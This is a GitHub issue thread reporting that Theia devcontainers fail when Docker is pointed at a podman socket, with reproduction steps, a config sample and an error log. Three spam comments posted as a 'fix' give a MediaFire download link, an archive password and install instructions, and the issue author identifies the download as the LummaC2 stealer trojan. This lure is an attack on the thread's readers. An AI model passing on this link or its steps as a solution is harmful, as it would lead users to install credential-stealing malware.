### ISSUE TITLE
Theia devcontainers doesnt work with podman socket

### ISSUE THREAD

**Issue by shdwchn10** [eclipse-theia/theia#14099]
### Steps to Reproduce:

1. Enable podman socket: `systemctl --user start podman.socket`
2. Export podman `export DOCKER_HOST=unix://$XDG_RUNTIME_DIR/podman/podman.sock`
3. Create simple `devcontainer.json` like this:
```json
{
    "image": "mcr.microsoft.com/devcontainers/typescript-node:0-18",
    "forwardPorts": [3000]
}
```
4. Reopen in Container
5. Nothing happens, but container was created. `podman ps`:
```
1a4636f12a30  mcr.microsoft.com/devcontainers/typescript-node:0-18  node                  27 seconds ago  Up 27 seconds                                                  strange_ritchie
```

### Screencast

[Screencast from 2024-08-31 08-53-54.webm](https://github.com/user-attachments/assets/e8bea4a1-2c99-48ac-b373-e5f99c21f8f6)

### Additional Information

- Operating System: Fedora Linux 40.20240828.0 (Silverblue)
- Podman version: 5.2.2
- Theia Version: 1.52.0

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shdwchn10** [comment]
Again those malware posts… sigh

I don't even have Windows to run this LummaC2 Trojan Stealer :(

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shdwchn10** [comment]
Error from log:
```
2024-09-01T16:21:17.031Z root ERROR Error: (HTTP code 500) server error - can't talk to a V1 container registry 
    at /tmp/.mount_TheiaIlqrpp7/resources/app/lib/backend/268.js:2:782719
    at s (/tmp/.mount_TheiaIlqrpp7/resources/app/lib/backend/268.js:2:782652)
    at IncomingMessage.<anonymous> (/tmp/.mount_TheiaIlqrpp7/resources/app/lib/backend/268.js:2:782580)
    at IncomingMessage.emit (node:events:529:35)
    at endReadableNT (node:internal/streams/readable:1368:12)
    at process.processTicksAndRejections (node:internal/process/task_queues:82:21)
```
